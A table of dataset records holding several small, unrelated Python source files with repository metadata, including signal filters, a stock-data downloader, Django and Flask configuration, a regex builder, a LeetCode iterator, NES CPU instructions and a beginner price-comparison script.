hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
be62c8d9e725078536f0891cffbcc08c85ff6f54 | 979 | py | Python | my_general_helpers.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | my_general_helpers.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | my_general_helpers.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | from scipy.signal import butter, filtfilt
from numba import jit
import bisect


def is_number_in_sorted_vector(sorted_vector, num):
    index = bisect.bisect_left(sorted_vector, num)
    return index != len(sorted_vector) and sorted_vector[index] == num


# def butter_lowpass(cutoff, fs, order=5):
#     nyq = 0.5 * fs
#     normal_cutoff = cutoff / nyq
#     b, a = butter(order, normal_cutoff, btype='low', analog=False)
#     return b, a


def butter_lowpass_filter(data, cutoff, fs, order):
    nyq = 0.5 * fs  # Nyquist frequency
    normal_cutoff = cutoff / nyq
    # Get the filter coefficients
    b, a = butter(order, normal_cutoff, btype='low', analog=False)
    y = filtfilt(b, a, data)
    return y


@jit
def first_order_lowpass_filter(signal_in, signal_out, tau, dt):
    alpha_lowpass = dt / (tau + dt)
    signal_out[0] = signal_in[0]
    for i in range(1, len(signal_in)):
        signal_out[i] = alpha_lowpass*signal_in[i] + (1 - alpha_lowpass)*signal_out[i-1]
| 27.971429 | 86 | 0.684372 | 151 | 979 | 4.238411 | 0.344371 | 0.09375 | 0.046875 | 0.021875 | 0.1375 | 0.1375 | 0.1375 | 0.1375 | 0.1375 | 0.1375 | 0 | 0.012771 | 0.200204 | 979 | 34 | 87 | 28.794118 | 0.804598 | 0.225741 | 0 | 0 | 0 | 0 | 0.004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.222222 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
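The sorted-membership helper in `my_general_helpers.py` above is pure standard library, so it can be exercised in isolation. A minimal, self-contained sketch (the sample vectors are invented for illustration):

```python
import bisect

def is_number_in_sorted_vector(sorted_vector, num):
    # bisect_left finds the leftmost insertion point; the value is present
    # only if that index is in range and holds exactly `num`.
    index = bisect.bisect_left(sorted_vector, num)
    return index != len(sorted_vector) and sorted_vector[index] == num

print(is_number_in_sorted_vector([1, 3, 5, 8], 5))  # True
print(is_number_in_sorted_vector([1, 3, 5, 8], 4))  # False
```

This is O(log n) per lookup, versus O(n) for `num in sorted_vector` on a plain list.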
be665281e674fbcee73480a5a06334a427283318 | 1,254 | py | Python | download.py | kaija/taiwan_stockloader | 637244c3b0bc96093cc5a7b3df093a829f9e3c2d | [
"MIT"
] | 2 | 2015-06-13T09:17:46.000Z | 2015-10-25T15:31:33.000Z | download.py | kaija/taiwan_stockloader | 637244c3b0bc96093cc5a7b3df093a829f9e3c2d | [
"MIT"
] | null | null | null | download.py | kaija/taiwan_stockloader | 637244c3b0bc96093cc5a7b3df093a829f9e3c2d | [
"MIT"
] | 3 | 2016-02-01T07:36:55.000Z | 2018-08-03T12:22:20.000Z | import datetime
import httplib
import urllib
from datetime import timedelta

#now = datetime.datetime.now()
#today = now.strftime('%Y-%m-%d')
#print today


def isfloat(value):
    try:
        float(value)
        return True
    except ValueError:
        return False


def convfloat(value):
    try:
        return float(value)
    except ValueError:
        return -1


today = datetime.date.today()
one_day = timedelta(days=1)
#start_day = datetime.date(2004, 2, 11)
start_day = datetime.date(2010, 8, 21)
print "Download from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")

dl_date = start_day
while dl_date < today:
    httpreq = httplib.HTTPConnection('www.twse.com.tw')
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    date_str = str(dl_date.year - 1911) + dl_date.strftime("/%m/%d")
    form = urllib.urlencode({'download': 'csv', 'qdate': date_str, 'selectType': 'ALLBUT0999'})
    httpreq.request("POST", "/ch/trading/exchange/MI_INDEX/MI_INDEX.php", form, headers)
    httpres = httpreq.getresponse()
    stock_csv = httpres.read()
    file_name = "data/" + dl_date.strftime("%Y%m%d") + ".csv"
    print "downloading " + file_name
    f = open(file_name, "w")
    f.write(stock_csv)
    f.close()  # close the handle so each CSV is flushed to disk
    dl_date += one_day
print "Download Finish!"
| 23.660377 | 93 | 0.692185 | 181 | 1,254 | 4.679558 | 0.469613 | 0.042503 | 0.047226 | 0.051948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022181 | 0.137161 | 1,254 | 52 | 94 | 24.115385 | 0.760628 | 0.089314 | 0 | 0.117647 | 0 | 0 | 0.212841 | 0.065963 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.117647 | null | null | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
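The download loop in `download.py` above walks one day at a time and builds a Minguo (ROC) date string for the TWSE form (`year - 1911`). That date logic is separable from the Python 2 network code and can be sketched with the Python 3 standard library only (the dates are chosen arbitrarily):

```python
from datetime import date, timedelta

def date_range(start, end):
    # Yield each calendar day from start (inclusive) up to end (exclusive),
    # mirroring the `while dl_date < today` loop in download.py.
    d = start
    while d < end:
        yield d
        d += timedelta(days=1)

def twse_qdate(d):
    # The TWSE form expects the ROC (Minguo) calendar: Gregorian year minus 1911.
    return str(d.year - 1911) + d.strftime("/%m/%d")

days = list(date_range(date(2010, 8, 21), date(2010, 8, 24)))
print([d.strftime("%Y%m%d") for d in days])  # ['20100821', '20100822', '20100823']
print(twse_qdate(date(2010, 8, 21)))         # 99/08/21
```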
be687c8fd20a0765459343471aaeb0dc60aa0c2b | 666 | py | Python | evennia/scripts/migrations/0013_auto_20191025_0831.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,544 | 2015-01-01T22:16:31.000Z | 2022-03-31T19:17:45.000Z | evennia/scripts/migrations/0013_auto_20191025_0831.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,686 | 2015-01-02T18:26:31.000Z | 2022-03-31T20:12:03.000Z | evennia/scripts/migrations/0013_auto_20191025_0831.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 867 | 2015-01-02T21:01:54.000Z | 2022-03-29T00:28:27.000Z | # Generated by Django 2.2.6 on 2019-10-25 12:31

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [("scripts", "0012_auto_20190128_1820")]

    operations = [
        migrations.AlterField(
            model_name="scriptdb",
            name="db_typeclass_path",
            field=models.CharField(
                db_index=True,
                help_text="this defines what 'type' of entity this is. This variable holds a Python path to a module with a valid Evennia Typeclass.",
                max_length=255,
                null=True,
                verbose_name="typeclass",
            ),
        )
    ]
| 28.956522 | 150 | 0.587087 | 76 | 666 | 5.013158 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075556 | 0.324324 | 666 | 22 | 151 | 30.272727 | 0.771111 | 0.067568 | 0 | 0 | 1 | 0.0625 | 0.298869 | 0.037157 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
be6d27c87017d3ff2b758a9a1954cf3e265b550c | 554 | py | Python | iocms/iocms/urls.py | Gaurav-Zaiswal/iw-acad-iocms-be | a133f120eed93433925608f08c5145d2d0d1db39 | [
"MIT"
] | null | null | null | iocms/iocms/urls.py | Gaurav-Zaiswal/iw-acad-iocms-be | a133f120eed93433925608f08c5145d2d0d1db39 | [
"MIT"
] | null | null | null | iocms/iocms/urls.py | Gaurav-Zaiswal/iw-acad-iocms-be | a133f120eed93433925608f08c5145d2d0d1db39 | [
"MIT"
] | 2 | 2021-09-16T04:44:59.000Z | 2021-09-16T05:45:31.000Z | from django.contrib import admin
from django.urls import include, path
from django.conf import settings
from django.conf.urls.static import static

urlpatterns = [
    path('admin/', admin.site.urls),
    path('class/', include('classroom.urls')),
    path('assignment-api/', include('assignment.urls', namespace='assignment')),
    path('feed/', include('feed.urls', namespace='feed')),
    path('users/', include('users.urls'), name="user-register")
]

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 36.933333 | 80 | 0.720217 | 70 | 554 | 5.657143 | 0.414286 | 0.10101 | 0.070707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117329 | 554 | 14 | 81 | 39.571429 | 0.809816 | 0 | 0 | 0 | 0 | 0 | 0.203971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
be6f16523ef2463524119c42f75567ed0f66d560 | 1,905 | py | Python | src/security/__init__.py | slippers/blogging_security_flatpage | 53644978b798c66369416b1e5625cc04d89c0a87 | [
"MIT"
] | 1 | 2018-12-31T05:30:13.000Z | 2018-12-31T05:30:13.000Z | src/security/__init__.py | slippers/blogging_security_flatpage | 53644978b798c66369416b1e5625cc04d89c0a87 | [
"MIT"
] | null | null | null | src/security/__init__.py | slippers/blogging_security_flatpage | 53644978b798c66369416b1e5625cc04d89c0a87 | [
"MIT"
] | null | null | null | from src import app, db
from .models import User, Role, RoleUsers
from .security_admin import UserAdmin, RoleAdmin
from flask_security import Security, SQLAlchemyUserDatastore, \
    login_required, roles_accepted
from flask_security.utils import encrypt_password


def config_security_admin(admin):
    admin.add_view(UserAdmin(db.session))
    admin.add_view(RoleAdmin(db.session))


def configure_security():
    # Create the Roles "admin" and "end-user" -- unless they already exist
    user_datastore.find_or_create_role(name='admin', description='Administrator')
    user_datastore.find_or_create_role(name='end-user', description='End user')
    user_datastore.find_or_create_role(name='blogger', description='Blogger')

    # Create two Users for testing purposes -- unless they already exist.
    # In each case, use the Flask-Security utility function to encrypt the password.
    pw = encrypt_password('password')
    # pw = 'password'
    if not user_datastore.get_user('someone@example.com'):
        user_datastore.create_user(email='someone@example.com', password=pw)
    if not user_datastore.get_user('admin@example.com'):
        user_datastore.create_user(email='admin@example.com', password=pw)

    # Give one User the "end-user" role, while the other has the "admin" role.
    # (This will have no effect if the Users already have these Roles.)
    # Again, commit any database changes.
    user_datastore.add_role_to_user('someone@example.com', 'end-user')
    user_datastore.add_role_to_user('someone@example.com', 'blogger')
    user_datastore.add_role_to_user('admin@example.com', 'admin')
    user_datastore.add_role_to_user('admin@example.com', 'blogger')
    db.session.commit()


# Setup Flask-Security
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)

# Create any database tables that don't exist yet.
db.create_all()
| 40.531915 | 83 | 0.752756 | 265 | 1,905 | 5.218868 | 0.328302 | 0.122198 | 0.049168 | 0.057845 | 0.284165 | 0.284165 | 0.248012 | 0.121475 | 0.121475 | 0 | 0 | 0 | 0.143307 | 1,905 | 46 | 84 | 41.413043 | 0.847426 | 0.251969 | 0 | 0 | 0 | 0 | 0.160537 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.153846 | 0.192308 | 0 | 0.269231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
be76f999496b5e5961109377d7a8e9bebf2c7e1e | 2,576 | py | Python | regexem.py | lvijay/ilc | 1c3b1381e7e5a5064bda829e3d34bfaf24745d1a | [
"BSD-3-Clause-No-Nuclear-Warranty"
] | 1 | 2019-01-03T17:44:11.000Z | 2019-01-03T17:44:11.000Z | regexem.py | lvijay/ilc | 1c3b1381e7e5a5064bda829e3d34bfaf24745d1a | [
"BSD-3-Clause-No-Nuclear-Warranty"
] | null | null | null | regexem.py | lvijay/ilc | 1c3b1381e7e5a5064bda829e3d34bfaf24745d1a | [
"BSD-3-Clause-No-Nuclear-Warranty"
] | null | null | null | #!/usr/bin/python
# -*- mode: python; -*-

## This file is part of Indian Language Converter
## Copyright (C) 2006 Vijay Lakshminarayanan <liyer.vijay@gmail.com>

## Indian Language Converter is free software; you can redistribute it
## and/or modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2 of
## the License, or (at your option) any later version.

## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
## General Public License for more details.

## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
## 02110-1301, USA.

## $Id: regexem.py,v 1.4 2006-03-26 03:15:24 vijay Exp $

## Author: Vijay Lakshminarayanan
## $Date: 2006-03-26 03:15:24 $

import sys
from re import escape


def regexem(strlst):
    """Returns a single string which is the regular expression to
    identify any single word in the given argument.

    See the Examples given at the end of this file."""
    return regexem_internal([escape(s) for s in strlst])


def regexem_internal(strlst):
    strlst.sort()
    s, rest = strlst[0], strlst[1:]
    groups = {}
    groups[s] = [s]
    for string in rest:
        if string.startswith(s) and len(s) < len(string):  # avoid duplicates
            groups[s].append(string[len(s):])              # add the suffix to the group
        else:
            s = string                                     # a fresh prefix
            groups[s] = [s]

    regex = ''
    for prefix, words in groups.items():
        inreg = ''
        if len(words) == 2:    # i.e. words[0] is a subset of words[1]
            inreg += words[0] + '(' + words[1] + ')' + '?'
        elif len(words) > 2:
            inreg += words[0] + '(' + regexem_internal(words[1:]) + ')' + '?'
        else:
            inreg += prefix    # since prefix == words[0] in this case.
        regex += '(' + inreg + ')' + '|'
    return regex[:-1]          # we don't need the last '|'


if __name__ == '__main__':
    print ''.join(regexem(sys.argv[1:]))


## Examples
#
# $ ./regexem.py emacs vi ed
# (ed)|(emacs)|(vi)
#
# $ ./regexem.py batsman bats well
# (well)|(bats(man)?)
#
# $ ./regexem.py houses housefly
# (houses)|(housefly)  ## Note that they aren't grouped together
#
## a slightly complicated example
# $ ./regexem.py an anteater and an ant
# (an((d)|(t(eater)?))?)
| 33.025641 | 77 | 0.632376 | 373 | 2,576 | 4.337802 | 0.490617 | 0.027812 | 0.024104 | 0.035229 | 0.067985 | 0.051916 | 0 | 0 | 0 | 0 | 0 | 0.029828 | 0.232143 | 2,576 | 77 | 78 | 33.454545 | 0.78817 | 0.552407 | 0 | 0.142857 | 0 | 0 | 0.018418 | 0 | 0.035714 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
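`regexem.py` above targets Python 2 (`print` statement). A hedged Python 3 port of the same prefix-factoring idea follows — this is not the author's code, and the order of the alternatives can differ from the 2006 examples because it depends on dict iteration order:

```python
import re
from re import escape

def regexem(strlst):
    # Build one regex that matches any whole word in strlst,
    # factoring shared prefixes, e.g. bats/batsman -> bats(man)?.
    return _regexem_internal([escape(s) for s in strlst])

def _regexem_internal(strlst):
    strlst = sorted(strlst)
    s, rest = strlst[0], strlst[1:]
    groups = {s: [s]}
    for string in rest:
        if string.startswith(s) and len(s) < len(string):
            groups[s].append(string[len(s):])  # keep only the suffix
        else:
            s = string                         # a fresh prefix
            groups[s] = [s]
    parts = []
    for prefix, words in groups.items():
        if len(words) == 2:      # words[0] is a prefix of words[1]
            parts.append(words[0] + '(' + words[1] + ')?')
        elif len(words) > 2:
            parts.append(words[0] + '(' + _regexem_internal(words[1:]) + ')?')
        else:
            parts.append(prefix)
    return '|'.join('(' + p + ')' for p in parts)

pattern = regexem(['batsman', 'bats', 'well'])
print(pattern)  # (bats(man)?)|(well)
```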
be876cf3ef298b948a6559bdc7b9b04da2062463 | 589 | py | Python | 0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jiadaizhao/LeetCode | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | [
"MIT"
] | 49 | 2018-05-05T02:53:10.000Z | 2022-03-30T12:08:09.000Z | 0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 11 | 2017-12-15T22:31:44.000Z | 2020-10-02T12:42:49.000Z | 0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 28 | 2017-12-05T10:56:51.000Z | 2022-01-26T18:18:27.000Z | class Vector2D:
    def __init__(self, v: List[List[int]]):
        def getIt():
            for row in v:
                for val in row:
                    yield val
        self.it = iter(getIt())
        self.val = next(self.it, None)

    def next(self) -> int:
        result = self.val
        self.val = next(self.it, None)
        return result

    def hasNext(self) -> bool:
        return self.val is not None

# Your Vector2D object will be instantiated and called as such:
# obj = Vector2D(v)
# param_1 = obj.next()
# param_2 = obj.hasNext()
| 22.653846 | 63 | 0.519525 | 77 | 589 | 3.896104 | 0.480519 | 0.093333 | 0.073333 | 0.1 | 0.14 | 0.14 | 0 | 0 | 0 | 0 | 0 | 0.013587 | 0.375212 | 589 | 25 | 64 | 23.56 | 0.80163 | 0.210526 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0.071429 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
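The generator-backed iterator above can be exercised end-to-end. A self-contained run (the input vector is invented; `typing.List` is imported so the annotation resolves outside LeetCode's harness):

```python
from typing import List

class Vector2D:
    def __init__(self, v: List[List[int]]):
        def get_it():
            for row in v:       # empty rows are skipped naturally
                for val in row:
                    yield val
        self.it = iter(get_it())
        self.val = next(self.it, None)  # one-element look-ahead

    def next(self) -> int:
        result = self.val
        self.val = next(self.it, None)
        return result

    def hasNext(self) -> bool:
        return self.val is not None

obj = Vector2D([[1, 2], [3], [], [4]])
out = []
while obj.hasNext():
    out.append(obj.next())
print(out)  # [1, 2, 3, 4]
```

The look-ahead slot (`self.val`) is what makes `hasNext` O(1) without materializing the whole vector.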
be8cef6fbad82834998e279653a3e939a968c9d8 | 2,244 | py | Python | instructions/instructions.py | fernandozanutto/PyNES | cb8d589ceb55cd7df0e114e726c6b6bbbc556172 | [
"Apache-2.0"
] | null | null | null | instructions/instructions.py | fernandozanutto/PyNES | cb8d589ceb55cd7df0e114e726c6b6bbbc556172 | [
"Apache-2.0"
] | null | null | null | instructions/instructions.py | fernandozanutto/PyNES | cb8d589ceb55cd7df0e114e726c6b6bbbc556172 | [
"Apache-2.0"
] | null | null | null | from addressing import *
from instructions.base_instructions import SetBit, ClearBit
from instructions.generic_instructions import Instruction
from status import Status


# set status instructions
class Sec(SetBit):
    identifier_byte = bytes([0x38])
    bit = Status.StatusTypes.carry


class Sei(SetBit):
    identifier_byte = bytes([0x78])
    bit = Status.StatusTypes.interrupt


class Sed(SetBit):
    identifier_byte = bytes([0xF8])
    bit = Status.StatusTypes.decimal


# clear status instructions
class Cld(ClearBit):
    identifier_byte = bytes([0xD8])
    bit = Status.StatusTypes.decimal


class Clc(ClearBit):
    identifier_byte = bytes([0x18])
    bit = Status.StatusTypes.carry


class Clv(ClearBit):
    identifier_byte = bytes([0xB8])
    bit = Status.StatusTypes.overflow


class Cli(ClearBit):
    identifier_byte = bytes([0x58])
    bit = Status.StatusTypes.interrupt


class Bit(Instruction):
    @classmethod
    def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
        return cpu.bus.read_memory(memory_address)

    @classmethod
    def apply_side_effects(cls, cpu, memory_address, value):
        and_result = cpu.a_reg & value
        cpu.status_reg.bits[Status.StatusTypes.zero] = not and_result
        cpu.status_reg.bits[Status.StatusTypes.overflow] = (value & (1 << 6)) > 0
        cpu.status_reg.bits[Status.StatusTypes.negative] = (value & (1 << 7)) > 0


class BitZeroPage(ZeroPageAddressing, Bit):
    identifier_byte = bytes([0x24])


class BitAbsolute(AbsoluteAddressing, Bit):
    identifier_byte = bytes([0x2C])


class Brk(ImplicitAddressing, Instruction):
    identifier_byte = bytes([0x00])

    @classmethod
    def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
        return super().get_data(cpu, memory_address, data_bytes)

    @classmethod
    def write(cls, cpu, memory_address, value):
        cpu.push_to_stack(cpu.pc_reg + 1, 2)
        cpu.push_to_stack(cpu.status_reg.to_int() | (1 << 4), 1)

    @classmethod
    def apply_side_effects(cls, cpu, memory_address, value):
        cpu.status_reg.bits[Status.StatusTypes.interrupt] = 1
        cpu.running = False

    @classmethod
    def get_cycles(cls):
        return 7
| 25.213483 | 72 | 0.69385 | 275 | 2,244 | 5.498182 | 0.309091 | 0.123677 | 0.125661 | 0.062831 | 0.388889 | 0.267196 | 0.205688 | 0.15873 | 0.15873 | 0.15873 | 0 | 0.021715 | 0.199643 | 2,244 | 88 | 73 | 25.5 | 0.820156 | 0.021836 | 0 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018248 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.070175 | 0.052632 | 0.719298 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
be917ccdfeb7754dd0eabc0327954755752723d8 | 425 | py | Python | Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 186c1ea3b839ba3139f9301660dec8fbd27a162e | [
"Apache-2.0"
] | null | null | null | Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 186c1ea3b839ba3139f9301660dec8fbd27a162e | [
"Apache-2.0"
] | null | null | null | Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 186c1ea3b839ba3139f9301660dec8fbd27a162e | [
"Apache-2.0"
] | null | null | null | prod1 = float(input("Insira o valor do produto A: "))
prod2 = float(input("Insira o valor do produto B: "))
prod3 = float(input("Insira o valor do produto C: "))

if prod1 < prod2 and prod1 < prod3:
    print("Escolha o produto A é o mais barato")
elif prod2 < prod1 and prod2 < prod3:
    print("Escolha o produto B é o mais barato")
elif prod3 < prod1 and prod3 < prod2:
    print("Escolha o produto C é o mais barato")
